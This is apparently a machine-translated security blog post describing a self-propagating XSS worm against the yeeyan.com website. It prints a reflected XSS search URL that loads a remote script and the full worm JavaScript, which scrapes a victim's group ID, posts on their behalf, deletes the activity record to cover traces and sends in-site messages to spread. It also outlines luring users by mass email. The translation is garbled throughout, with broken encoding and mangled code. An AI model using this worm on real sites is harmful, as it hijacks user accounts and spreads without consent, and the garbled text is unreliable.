Search Engine XSS Worm

Author: cosine
From 0x37 Security

It is interesting to have a challenge. In order to create a Search Engine XSS Worm, yeeyan is used here for an experiment. Yan. So I can only construct it like this:

Http://www.yeeyan.com/main/ysearch? Q = % 3Cs % 63% 72ipt % 3 Eeval (% 53% 74ring. f % 72om % 43% 68ar % 43ode (100,111, 99,117,109,101,110,116, 46,119,114,105,116,101, 60,115, 99,114,105,112,116, 32,115,114, 104,116,116,112, 47,119,119,119, 99,111,109, 47,121,121, 46,106,115, 47,115, 99,114,105,112,116, 63%, 41) % 3C/s % 72ipt % 3E

Originally, the search engine had no fun to do across sites, but this time in yeeyan, we can use this easy-to-be-ignored point to create an xss worm. To create a worm, you must solve the following problems:

Q1: How does the Search Engine XSS Trap contain remote worms?

A1. Because there are a lot of worms in code, it is impossible to appear in this XSS Trap at a time (comparison: Copy your own mini XSS Worm). Therefore, you need to use this XSS Trap to call remote worms. There are many ways to decode this XSS Trap and you will know my method :)

Q2. How can I allow other authenticated users to access this Search Engine XSS Trap?

A2. Send insite emails to several users (the worms can be used to send them in batches) to trick them into accessing the website. Once they access the website, the XSS Trap will call the remote worm, worms obtain information about their friends and their mailboxes. Other users have information. Therefore, the Search Engine XSS Trap can be widely transmitted with the insite email system.

Q2. How does the worm obtain the user flag information used to access the Search Engine XSS Trap?

A3. This is very important. The spread of worms requires many hosts. To obtain these hosts, you must be able to clearly obtain specific user flag information, such as his ID and space address. Once the worm is spread, it is explosively :).

I have solved these problems, so yeeyan's Search Engine XSS Worm was born successfully. The code for the worm is as follows:

Var _ x = false;
If (window. XMLHttpRequest ){
_ X = new XMLHttpRequest ();
} Else if (window. ActiveXObject ){
_ X = new ActiveXObject ("Msxml2.XMLHTTP ");
If (! _ X) {_ x = new ActiveXObject ("Microsoft. XMLHTTP ");}
}
_ 1 ();
Function _ 1 (){
Var _ u = _ 3or7 ("GET", "http://www.yeeyan.com/space/showme", null );
Re =/<a href = "/space/groups /(.*?) ">/I
R = _ u. match (re );
Src = "http://www.yeeyan.com/groups/newTopic ";
Var _ txt = "hello yeeyan .";
Argv_1 = "";
Argv_1 + = "--------------------- 7964f8dddeb95fc5Content-Disposition: form-data; name =" data [Post] [content] "";
Argv_1 + = (_ txt + "");
Argv_1 + = "--------------------- 7964f8dddeb95fc5Content-Disposition: form-data; name =" ymsggroup "";
Argv_1 + = ("" + "");
Argv_1 + = "--------------------- 7964f8dddeb95fc5Content-Disposition: form-data; name =" ymsgee "";
Argv_1 + = (r [1] + "");
Argv_1 + = "--------------------- 7964f8dddeb95fc5Content-Disposition: form-data; name =" ymsgee_username "";
Argv_1 + = (r [1] + "");
Argv_1 + = "--------------------- 7964f8dddeb95fc5 --";
_ 3or7 ("POST", src, argv_1 );
Var _ del = _ 3or7 ("GET", "http://www.yeeyan.com/space/deleteEvent/15429", null );
// Delete the record just like this :)
_ 2 ();
}
Function _ 2 (){
Src = "http://www.yeeyan.com/space/compose_message ";
Var _ to = "Yasmin ";
Var _ s = "yeeyan ";
Var _ m = "HELL )"
Argv_1 = "";
Argv_1 + = "--------------------- 7964f8dddeb95fc5Content-Disposition: form-data; name =" data [receiver_name] "";
Argv_1 + = (_ to + "");
Argv_1 + = "--------------------- 7964f8dddeb95fc5Content-Disposition: form-data; name =" data [subject] ";
Argv_1 + = (_ s + "");
Argv_1 + = "--------------------- 7964f8dddeb95fc5Content-Disposition: form-data; name =" data [message] [content] "";
Argv_1 + = (_ m + "");
Argv_1 + = "--------------------- 7964f8dddeb95fc5Content-Disposition: form-data; name =" data [message_id] "";
Argv_1 + = ("" + "");
Argv_1 + = "--------------------- 7964f8dddeb95fc5Content-Disposition: form-data; name =" data [action] "";
Argv_1 + = ("send" + "");
Argv_1 + = "--------------------- 7964f8dddeb95fc5 --";
_ 3or7 ("POST", src, argv_1 );
Alert (0 );
}
Function _ 3or7 (_ m, _ s, _ ){
_ X. open (_ m, _ s, false );
If (_ m = "POST") _ x. setRequestHeader ("Content-Type", "multipart/form-data; boundary = ----------------- 7964f8dddeb95fc5 ");
_ X. send (_ );
Return _ x. responseText;
}
To understand the code, refer to my previous article. Here is a clue: html "> http://www.0x37.com/post/2.html. The purpose of writing this worm is to verify the method mentioned in http://www.0x37.com/post/2.htmlmy article. I can only say that foreigners are a little irresponsible :) and I have to re-code it. This method works theoretically, I am in trouble. It is still easy to construct an HTTP message header to POST the worm information. I used a search engine to create worms. I did this for the first time. As long as the XSS Trap meets the requirements of the target attack point in the strict same domain, OK.